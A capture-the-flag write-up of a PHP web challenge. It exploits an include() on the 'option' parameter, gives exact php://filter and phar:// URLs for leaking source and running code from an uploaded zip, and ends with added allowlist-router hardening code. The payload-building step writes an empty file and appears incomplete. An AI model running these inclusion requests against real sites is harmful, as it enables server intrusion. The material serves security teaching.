Tags: phar web php upload
Rating: 3.5
Visiting the challenge, we are redirected to http://challenges.ctf.cert.rcts.pt:59812/index.php?option=home.
Requesting an invalid `option` produces a PHP error which reveals that whatever is passed in the `option` query parameter is passed to `include()` with a `.php` suffix appended. We exploit this using PHP stream wrappers to grab the source code:
URL: http://challenges.ctf.cert.rcts.pt:59812/index.php?option=file=php://filter/convert.base64-encode/resource=index
Using the same method for `resource=upload`, `resource=download`, and `resource=home`, we find that an uploaded file is saved at `uploads/md5(password)/md5(key).extension`. We also observe that `php://zip` is blocked but `php://phar` is allowed. We can exploit this by uploading a malicious archive and including it through the `phar://` wrapper to get the flag.
```bash
echo "" > payload.php
zip payload.zip payload.php
```
Upload `payload.zip`, note the returned key, and derive the upload path from the directory structure described above. Upon visiting
```
http://challenges.ctf.cert.rcts.pt:59812/index.php?option=phar://uploads/md5(password)/md5(key).zip/payload
```
We get our flag. (Note that `.php` is omitted here because `include()` appends it automatically, as seen in the `index.php` source retrieved earlier.)
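The root cause of both steps above is a single `include()` fed by the `option` parameter with `.php` glued on, which lets `php://filter` leak source and `phar://` execute code from an uploaded archive. The following is an added example, not the challenge's own code, of how the router could be written so that user input never reaches `include()` as a path: the page names `home`, `upload` and `download` come from the writeup, while the `pages/` directory layout, the `resolvePage`/`isSafePageName` helpers and the response handling are assumptions.

```php
<?php
// Added example (not the challenge's code): resolve `option` against a fixed
// allowlist instead of concatenating it into include().
declare(strict_types=1);

// The application does not need to read phar archives, so the wrapper is
// unregistered for the request as defence in depth.  The php:// wrapper
// cannot be unregistered, which is why the allowlist below is the main control.
stream_wrapper_unregister('phar');

// Page names observed in the writeup; the pages/ layout is assumed.
const PAGES = [
    'home'     => __DIR__ . '/pages/home.php',
    'upload'   => __DIR__ . '/pages/upload.php',
    'download' => __DIR__ . '/pages/download.php',
];

/**
 * Return the file to include for a requested option, or null if the request
 * is not one of the known pages.  The user-supplied value is only used as an
 * array key, so wrapper schemes such as php://filter or phar:// never reach
 * include(), and an unknown value cannot produce a path-disclosing error.
 */
function resolvePage(string $option): ?string
{
    return PAGES[$option] ?? null;
}

/**
 * For code that must still build a path from user input: accept only a short
 * token of safe characters (this rejects "://", "/", "\" and ".."), then
 * require the resolved file to exist and to sit directly under $baseDir.
 */
function isSafePageName(string $option, string $baseDir): bool
{
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $option)) {
        return false;
    }
    $base      = realpath($baseDir);
    $candidate = realpath($baseDir . '/' . $option . '.php');
    return $base !== false
        && $candidate !== false
        && strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0;
}

$option = $_GET['option'] ?? 'home';
$page   = resolvePage($option);
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');   // a generic message, not the failed include path
}
include $page;
```

With the allowlist in place, `option=php://filter/...` and `option=phar://uploads/...` both resolve to `null` and return a 404 instead of reaching `include()`. Independently of the router, the `uploads/` directory should be served with script execution disabled so that a file saved there can never run as PHP even if another inclusion path is found.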
## flag
`flag{ph4r_d3s3r14l1z4t10n_f0r_th3_w1n}`